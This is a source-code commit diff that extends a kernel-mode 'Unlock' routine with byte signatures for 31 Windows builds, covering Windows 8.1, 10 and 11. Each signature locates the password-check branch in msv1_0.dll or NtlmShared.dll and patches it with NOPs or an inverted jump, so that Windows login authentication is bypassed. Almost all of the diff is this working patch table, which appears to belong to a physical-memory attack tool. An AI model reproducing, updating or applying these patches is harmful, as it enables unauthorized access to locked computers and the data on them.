Version 4.17.5

Ulf Frisk
2023-11-26 17:16:40 +01:00
parent c472737692
commit 00eff8c8d1
7 changed files with 283 additions and 133 deletions


@@ -94,7 +94,7 @@ VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS2
typedef struct tdSignatureChunk {
WORD cbOffset;
BYTE cb;
BYTE pb[6];
BYTE pb[12];
} SIGNATURE_CHUNK, *PSIGNATURE_CHUNK;
typedef struct tdSignature {
@@ -129,10 +129,10 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages
return E_FAIL;
}
#define NUMBER_OF_SIGNATURES 20
#define NUMBER_OF_SIGNATURES 31
NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
{
SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = {
SIGNATURE oSigs[] = {
// win8.1x64 msv1_0.dll (2014-10-29)
{ .chunk = {
{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x42, 0xA4 } },
@@ -151,110 +151,192 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xB2, 0xB9 } },
{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384]
// AUTO-GENERATED SIGNATURES BELOW:
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
{ .chunk = {
{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xff, 0x15, 0x4b, 0x1c } },
{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x5DC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x4B, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x5E8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x5E8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
{ .chunk = {
{ .cbOffset = 0x62f,.cb = 4,.pb = { 0xff, 0x15, 0xb3, 0x1b } },
{ .cbOffset = 0x638,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
{ .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x65C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xCB, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x668,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x668,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
{ .chunk = {
{ .cbOffset = 0x6df,.cb = 4,.pb = { 0xff, 0x15, 0xd3, 0x1b } },
{ .cbOffset = 0x6e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
{ .cbOffset = 0x6e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x66C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xBB, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x678,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x678,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-02-06)/10.0.14393.2791]
{.chunk = {
{.cbOffset = 0x6f5,.cb = 6,.pb = { 0x49, 0x3B, 0xC6, 0x0F, 0x85, 0x18 } },
{.cbOffset = 0x6fb,.cb = 5,.pb = { 0x0FB, 0xFF, 0xFF, 0xB8, 0x01 } },
{.cbOffset = 0x6f9,.cb = 1,.pb = { 0x84 } } }
},
// Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
{ .chunk = {
{ .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } },
{ .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
{ .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x62C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB3, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x638,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106]
{.chunk = {
{.cbOffset = 0x625,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } },
{.cbOffset = 0x62e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
{.cbOffset = 0x62e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16]
{ .chunk = {
{ .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xd5, 0x1c } },
{ .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
{ .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x6DC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD3, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x6E8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x6E8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1]
{ .chunk = {
{ .cbOffset = 0x695,.cb = 4,.pb = { 0xff, 0x15, 0x55, 0x1c } },
{ .cbOffset = 0x69e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
{ .cbOffset = 0x69e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-10-02)/10.0.17134.1067]
{.chunk = {
{.cbOffset = 0x6ab,.cb = 6,.pb = { 0x49, 0x3B, 0xC6, 0x0F, 0x85, 0x2E } },
{.cbOffset = 0x6b1,.cb = 5,.pb = { 0xFB, 0xFF, 0xFF, 0xB0, 0x01 } },
{.cbOffset = 0x6af,.cb = 1,.pb = { 0x84 } } }
},
// Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1]
{.chunk = {
{.cbOffset = 0x740,.cb = 4,.pb = { 0xff, 0x15, 0xb2, 0x1b } },
{.cbOffset = 0x749,.cb = 4,.pb = { 0x0f, 0x84, 0x0b, 0xfb } },
{.cbOffset = 0x749,.cb = 2,.pb = { 0x0f, 0x85 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1]
// Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418]
{.chunk = {
{.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } },
{.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } },
{.cbOffset = 0x741,.cb = 2,.pb = { 0xb0, 0x01 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1]
{.chunk = {
{.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } },
{.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
{.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } }
},
// Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889]
{.chunk = {
{.cbOffset = 0x4B6,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xc3, 0x1f } },
{.cbOffset = 0x4c5,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
{.cbOffset = 0x4c5,.cb = 2,.pb = { 0x0f, 0x85 } } }
},
// Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887]
{.chunk = {
{.cbOffset = 0xa6e,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xb3, 0x28 } },
{.cbOffset = 0xa7d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
{.cbOffset = 0xa7d,.cb = 2,.pb = { 0x0f, 0x85 } } }
},
// Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
{ .chunk = {
{.cbOffset = 0xf8b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
{.cbOffset = 0xf9d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
{.cbOffset = 0xf9d,.cb = 2,.pb = { 0x0f, 0x85 } } }
{ .cbOffset = 0x6EC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC3, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x6F8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x6F8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
{ .chunk = {
{.cbOffset = 0x00b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
{.cbOffset = 0x01d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
{.cbOffset = 0x01d,.cb = 2,.pb = { 0x0f, 0x85 } } }
{ .cbOffset = 0x76C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x43, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x778,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x778,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382]
// Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
{ .chunk = {
{.cbOffset = 0xFBD,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x3c, 0x23 } },
{.cbOffset = 0xFCC,.cb = 6,.pb = { 0x0f, 0x85, 0xc4, 0xfa, 0xff, 0xff } },
{.cbOffset = 0xFCC,.cb = 2,.pb = { 0x0f, 0x85 } } }
{ .cbOffset = 0x77C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x33, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x788,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x788,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30]
{ .chunk = {
{ .cbOffset = 0x622,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB5, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x62E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x62E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30]
{ .chunk = {
{ .cbOffset = 0x612,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x61E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x61E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
{ .chunk = {
{ .cbOffset = 0x622,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x62E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x62E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
{ .chunk = {
{ .cbOffset = 0x612,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD5, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x61E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x61E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
{ .chunk = {
{ .cbOffset = 0x6A2,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x45, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x6AE,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x6AE,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01]
{ .chunk = {
{ .cbOffset = 0x692,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x55, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x69E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x69E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
{ .chunk = {
{ .cbOffset = 0x7CD,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x22, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x7D9,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x7D9,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04]
{ .chunk = {
{ .cbOffset = 0x73D,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB2, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x749,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x749,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
{ .chunk = {
{ .cbOffset = 0x74D,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xA2, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x759,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x759,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08]
{ .chunk = {
{ .cbOffset = 0x7DD,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x12, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x7E9,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x7E9,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
{ .chunk = {
{ .cbOffset = 0x72F,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC0, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x73B,.cb = 6,.pb = { 0x0F, 0x84, 0x09, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x73B,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07]
{ .chunk = {
{ .cbOffset = 0x423,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x53, 0x20, 0x00, 0x00 } },
{ .cbOffset = 0x435,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x435,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09]
{ .chunk = {
{ .cbOffset = 0x4B3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xC3, 0x1F, 0x00, 0x00 } },
{ .cbOffset = 0x4C5,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x4C5,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17]
{ .chunk = {
{ .cbOffset = 0x4C3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x1F, 0x00, 0x00 } },
{ .cbOffset = 0x4D5,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x4D5,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30]
{ .chunk = {
{ .cbOffset = 0xA7B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xA3, 0x28, 0x00, 0x00 } },
{ .cbOffset = 0xA8D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0xA8D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04]
{ .chunk = {
{ .cbOffset = 0xA6B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x28, 0x00, 0x00 } },
{ .cbOffset = 0xA7D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0xA7D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09]
{ .chunk = {
{ .cbOffset = 0x00B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xE3, 0x22, 0x00, 0x00 } },
{ .cbOffset = 0x01D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x01D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08]
{ .chunk = {
{ .cbOffset = 0x01B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xD3, 0x22, 0x00, 0x00 } },
{ .cbOffset = 0x02D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x02D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18]
{ .chunk = {
{ .cbOffset = 0xF8B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x63, 0x23, 0x00, 0x00 } },
{ .cbOffset = 0xF9D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0xF9D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14]
{ .chunk = {
{ .cbOffset = 0xFC9,.cb = 11,.pb = { 0x48, 0x8D, 0x4B, 0x10, 0x48, 0xFF, 0x15, 0x2C, 0x23, 0x00, 0x00 } },
{ .cbOffset = 0xFDC,.cb = 6,.pb = { 0x0F, 0x85, 0xC4, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0xFDC,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
};
KERNEL_FUNCTIONS2 fnk2;
PPHYSICAL_MEMORY_RANGE pMemMap, pMM;